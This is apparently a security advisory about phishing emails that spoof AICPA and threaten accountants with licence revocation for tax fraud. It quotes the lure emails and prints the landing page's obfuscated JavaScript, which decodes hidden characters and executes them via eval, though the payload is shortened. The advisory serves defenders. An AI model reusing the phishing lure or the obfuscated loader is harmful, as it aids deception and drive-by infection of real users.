Emails regarding accountant license from AICPA leads to site with obfuscated Javascript exploit


MX Lab, http://www.mxlab.eu, is noticing some emails regarding the possibility that the account license from AICPA will be revoked duet tax return fraud accusations.

The emails have subjects like:

Fraudulant tax return assistance accusations.
Income tax fraud accusations.
Income tax return fraud accusations.
Tax return fraud accusations.
Your accountant license can be revoked.
Your accountant CPA license termination.
….

The email is send from the spoofed addresses like admin@aicpa.org, alerts@aicpa.org, risk@aicpa.org, info@aicpa.org, service@aicpa.org, risk.manager@aicpa.org, support@aicpa.org,…. and has the following body:

Dear accountant officer,

We have been informed of your recent assistance in tax return fraud on behalf of one of your clients. According to AICPA Bylaw Subsection 765 your Certified Public Accountant status can be revoked in case of the act of filing of a incorrect or fraudulent tax return for your client or employer.

Please find the complaint below below and provide your feedback to it within 7 days. The failure to do so within this term will result in cancellation of your Accountant status.

Here is an example of the message:

The message contains the URL “Complant.pdf” that leads to a web host where the HTML page is loaded with an obfuscated Javascript behind.

The obfuscated Javascript contains some code to open an iframe:

When I tried to access this page directly I got the following on my screen:

When viewing the HTML source code we found some additional coding:

<html><body><div style="display:none;"><p>@wpgtp@^p^@pg^p@tpgwp^opop^^p^2pg3p
^op@tp-2p-3pzwp@^p@tpgwp^op@tp^2p20pzwpg2p^p20p3wpggp@tp@@p^3p@tp-z0p^^p@@pg3p
^op-z0p^0p@@pgzp@tp-z0pg3p^3p-z0pggpgtp@@p@wpg3pgwpgzpopopopzwp@pg2p^p20pzwp@p
@^p@tpgwp^op@tp^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^opg3pgtpgwp-z0p@tpgwp@wp
@3p^2p@tp@wpg3p^2p@tp@^p^op-2p-zpwzpw3p^gp@@p^2p-
......
......SHORTENED VERSION OF THE CODE.....
......
zpz^</p></div><script>
ss='s';g='g';r='r';
try{new window(123).asd;}catch(qq){aa=/s/g.exec("a"+"sd").index+[];e=eval;}
aaa=1+[];
i=0;
try{new window(123).qwey();}catch(qqq){
if(aaa==aa)
while(1){
	a=document.body.childNodes[i];
	if(a.tagName.toLowerCase() == "div") break;
	i++;
}
a=a.childNodes[0].innerHTML[r+'eplace'](/\^/g,"7")[r+'eplace'](/@/g,"5")
[r+'eplace'](/g/g,"6")[r+'eplace'](/z/g,"1")[r+'eplace'](/w/g,"8")
[r+'eplace'](/t/g,"9")[r+'eplace'](/o/g,"4");}
a=a.split("p");
md='a';
			c=[];
			i=0;
			p=parseInt;
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=String;}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr="fromChar";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){fr+="Code";}
			try{new RegExp("12").exec("41").type+1;}catch(qqq){qq=qq[fr];}
if(aaa==aa){
			while(15042>i){
				vv=a[i];
				r2=cc=qq(41+1+p(vv));
				r=c;
				if(fr)c=r+r2;
				i=i+1;
			}
			w=e;
			w(c);
}
		</script></body></html>

Recommended action when you receive this type of message: delete and do not click on any of the embedded URLs at the top “View it in your browser”, the Complaint.pdf URL or at the end of the message where the email is.